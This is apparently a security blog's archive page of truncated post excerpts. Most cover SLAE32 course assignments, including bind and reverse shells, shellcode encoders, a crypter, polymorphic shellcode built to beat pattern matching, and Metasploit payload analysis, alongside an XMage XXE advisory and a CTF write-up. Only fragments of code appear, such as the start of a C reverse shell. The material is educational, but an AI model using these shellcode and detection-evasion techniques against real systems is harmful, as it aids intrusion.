Posts

Showing posts from 2020

SLAE32 - Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Crypters
For this assignment, students are tasked with creating a custom shellcode crypter.
Requirements:
- Create a custom crypter like the one shown in the "crypters" video
- Free to use any existing encryption schema
- Can use any programming language
Task 7 was... interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm.
My original plan did end up being the outcome, although it took a detour and ended up at the same result. For this task I decided to go the AES CBC route-- it's a common and easily implemented encryption scheme. Using this article, I was able to come up with a PoC encryption / decryption script pretty quickly. I…

SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Shellcode Analysis
This task requests students to disassemble and analyze at least three shellcode samples created by Metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc. had not yet been combined into msfvenom, which is what I'll obviously use.

Requirements:
- Take up at least 3 shellcode samples created using Msfpayload for linux/x86
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
I decided to perform analysis on the following three payloads:
- shell_reverse_tcp (a non-staged reverse shell)
- shell_bind_tcp (a non-staged bind shell)
- adduser (a payload for adding a user, duh)
Although not the …

SLAE32 - Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Polymorphic Shellcodes
Assignment 6 required students to take three shellcodes from Shell-Storm and create polymorphic versions of them.

Requirements:

- Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
- The polymorphic versions cannot be larger than 150% of the existing shellcode
Shellcode 1:
The first shellcode I chose for this assignment was a shellcode which adds a value to an /etc/hosts file, available here
I like the idea here, as it's a little out of the normal shellcode tactic. It's not 'covert' but it certainly isn't just spawning /bin/bash :shrug The original shellcode is 77 bytes, so it's not huge, especially considering the…

SLAE32 - Assignment 4

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Encoders
For this assignment, students were tasked with creating a custom encoding scheme, such as the "Insertion Encoder" from the course.
Requirements:
- Create a custom encoding scheme like the "Insertion Encoder"
- Write a PoC using execve-stack as the shellcode to encode with your schema and execute
Pretty simple! For this task, I decided to start with a simple ROT cipher as we're simply trying to avoid signature-based detections. In Python, that might look like this:
>>> input = 1
>>> rotate = 13
>>> out = input + rotate
>>> print(out)
14
That's pretty... expected, haha. Translated to asm, that's still very simple and there are a number of ways…

SLAE32 - Assignment 3

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Egghunters! Woooo! I love egghunters, I think they're super cool.
There's a lot of information out there on the web about egghunters, and some really good papers too (e.g. Skape). If you're totally unfamiliar and just want the tldr, here's the gist of it:

Let's say you are testing some sort of server application, maybe it's an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. "Hooray!" you might be thinking, "Now I can send my payload!"

To your dismay, after sending payload after payload you …

SLAE32 - Assignment 2

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Reverse Shell
Requirements:
- Connects to configured IP and port
- Execs shell on successful connection
- IP and port should be 'easily' configurable
As with the TCP Bind shell from assignment one, I decided the best bet was to write out a reverse shell in C. There's a million resources out there, and the code I came up with is as follows:
/* C reverse shell for SLAE */
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#define rhost "127.0.0.1"
#define rport "4444"
int main(int argc, char *argv[])
{…

SLAE32 - Assignment 1

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Bind Shell
Requirements:
- Binds to a port
- Executes a shell on incoming connection
- Port should be 'easily' configurable
For this assignment, I started like many others and first disassembled Metasploit shellcode. It had the basic principles I expected, but to my dismay it didn't really help me to write my own-- MSF's shellcodes are well optimized, so I felt like I'd basically just be copying code, rather than learning to implement it myself. I decided to first write a bind shell in C, as it's low level and I'd be (essentially) making the same calls:
// Shell_bind_tcp
// For SLAE32
// Howard McGreehan
#include <sys/socket.h>
#include <unistd.h>
#include <netinet…

13 - XXE in XMage Client <= 1.4.42V7

Lately, I've been doing quite a bit of SCR engagements for work. In my efforts to become a little better, I've been doing more on my own time. I enjoy code review, but alas, like anything else, it can get boring at times. In order to make it not quite so boring, I look for applications that interest me. One application I started poking around with is named XMage-- it's a Java application that a few friends and I use to play MtG. While admittedly a little bit clunky, XMage does a phenomenal job at rules enforcement, something similar clients don't even attempt. In fact, it does so good a job that it's likely you'll find out that some cards really don't work like you think they do (total buzzkill).
XMage is open source and has some great documentation. I got the latest build set up in IDEA with the help of maven and began by running SpotBugs against the Client and Server. To my dismay, the results were mega boring. Instead of just trusting t…

12 - DC207 April CTF

DC207's April 2020 CTF
Recently I took part in a CTF put on by my local DefCon group. I had a lot of fun, learned some cool stuff and decided to do a writeup as I acquired all the flags. The CTF was split into four categories: 'Fun Fun Fun Fun', 12 puzzle-style questions, and three virtual machines.
Fun Fun Fun Fun
#1 If only it were that easy
Solve the puzzle for the solution:
yetz{lhfxpaxkxhoxkmaxvbiaxk}
It's a Caesar cipher! ROT[ate]7!
flag{somewhereoverthecipher}
#2 Horse Meatballs
Attached is the clue. Decode the message, the flag is the name of the source of the content: notavirus.wav
Hmm, well, since it's not a virus I downloaded the file and opened it. After collecting my computer parts and reassembling it after I threw it out the window in my haste to disconnect it from my network, I realized the beeping noises were *gasp*, MORSE COOOOooode. Using morsecode.world, you can upload Morse code files for decoding. Or, if you're spooked and would rather not u…